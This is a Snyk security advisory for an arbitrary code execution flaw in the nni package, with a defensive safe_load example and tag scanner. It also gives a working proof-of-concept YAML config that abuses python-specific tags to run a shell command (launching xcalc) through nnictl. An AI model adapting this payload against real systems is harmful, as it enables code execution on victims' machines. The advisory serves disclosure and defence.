Arbitrary Code Execution Affecting nni package, versions [,2.1)


Severity

high (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity
Proof of Concept

  • Snyk ID: SNYK-PYTHON-NNI-1073630
  • published: 10 Mar 2021
  • disclosed: 12 Feb 2021
  • credit: Abhiram V, Ajmal Aboobacker

Introduced: 12 Feb 2021

CVE: not available. CWE-94
First added by Snyk

How to fix?

Upgrade nni to version 2.1 or higher.

Overview

nni is a Neural Network Intelligence package.

Affected versions of this package are vulnerable to Arbitrary Code Execution. The experiment configuration file is parsed with the unsafe YAML load() function, which honours python-specific tags and can therefore instantiate arbitrary Python objects and call arbitrary functions while parsing; a crafted config passed to nnictl runs attacker-chosen code.
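The defensive pattern for the weakness described above, as an added example that is not nni's own code: parse the experiment config with PyYAML's yaml.safe_load, which builds only plain mappings, lists and scalars and raises a ConstructorError on the !!python/ tags that the unsafe loader honours, plus a stdlib line scanner that flags such tags in config files for CI or detection use. The configuration text, the function names and the harmless os.getcwd tag in the rejected sample are constructed for this example.

```python
"""Safe loading of YAML experiment configs (added example, not nni's code)."""
import re

try:
    import yaml  # PyYAML; assumed available for the safe_load path
except ImportError:
    yaml = None

# Tag forms that only PyYAML's unsafe loaders honour: they construct Python
# objects, call functions or resolve names at parse time.
PYTHON_TAG_RE = re.compile(r"!!python/|!<tag:yaml\.org,2002:python/")

# Constructed sample: a plausible experiment config with no special tags.
BENIGN_CONFIG = """\
authorName: default
experimentName: example_mnist_pytorch
trialConcurrency: 1
maxExecDuration: 1h
maxTrialNum: 10
trainingServicePlatform: local
searchSpacePath: search_space.json
useAnnotation: false
tuner:
  builtinTunerName: TPE
  classArgs:
    optimize_mode: maximize
trial:
  command: python3 mnist.py
  codeDir: .
  gpuNum: 0
"""

# Constructed sample: same shape, but one field carries a python-specific tag.
# A harmless name lookup is used here; the PoC on this page abuses the same
# mechanism with a different tag.
TAGGED_CONFIG = BENIGN_CONFIG.replace(
    "authorName: default", "authorName: !!python/name:os.getcwd"
)


def find_python_tags(text):
    """Return (line_number, stripped_line) for each line carrying a python tag.

    A plain-text pre-check that works without a YAML parser, usable as a CI
    gate or a detection rule over config files before nnictl ever sees them.
    """
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if PYTHON_TAG_RE.search(line):
            hits.append((number, line.strip()))
    return hits


def load_experiment_config(text):
    """Parse an experiment config without allowing object construction.

    Vulnerable form this replaces: yaml.load(text, Loader=yaml.Loader)
    (or the bare yaml.load(text) of PyYAML < 5.1), which honours !!python/*
    tags. safe_load only builds str/int/float/bool/None/list/dict values and
    raises ConstructorError (a YAMLError) for any tag it has no constructor for.
    """
    if yaml is None:
        raise RuntimeError("PyYAML is required to parse the config")
    try:
        config = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        raise ValueError("invalid experiment config: %s" % exc) from exc
    if not isinstance(config, dict):
        raise ValueError("experiment config must be a YAML mapping")
    return config


if __name__ == "__main__":
    print("benign config, trial command:",
          load_experiment_config(BENIGN_CONFIG)["trial"]["command"])
    print("tagged lines:", find_python_tags(TAGGED_CONFIG))
    try:
        load_experiment_config(TAGGED_CONFIG)
    except ValueError as exc:
        print("rejected:", exc)
```

The two functions are independent layers: the scanner gives a cheap, parser-agnostic signal (it also catches the verbatim `!<tag:yaml.org,2002:python/...>` spelling of the same tags), while safe_load is the actual fix, because it never resolves a tag into a Python callable regardless of how the tag is written.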

PoC

1. Create the following PoC file: exploit.py

import os

# Install the vulnerable package, then feed nnictl a config whose YAML
# tags are resolved by the unsafe loader at parse time.
os.system('pip3 install nni')

exploit = """authorName: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
experimentName: example_mnist_pytorch
trialConcurrency: 1
maxExecDuration: 1h
maxTrialNum: 10
#choice: local, remote, pai
trainingServicePlatform: local
searchSpacePath: search_space.json
#choice: true, false
useAnnotation: false
tuner:
  #choice: TPE, Random, Anneal, Evolution, BatchTuner, MetisTuner, GPTuner
  #SMAC (SMAC should be installed through nnictl)
  builtinTunerName: TPE
  classArgs:
    #choice: maximize, minimize
    optimize_mode: maximize
trial:
  command: python3 mnist.py
  codeDir: .
  gpuNum: 0
"""

with open('exploit.yml', 'w+') as f:
    f.write(exploit)

os.system('nnictl create --config exploit.yml')

2. Execute the following command in another terminal: python3 exploit.py
3. Check the output: xcalc will pop up.

CVSS Scores

version 3.1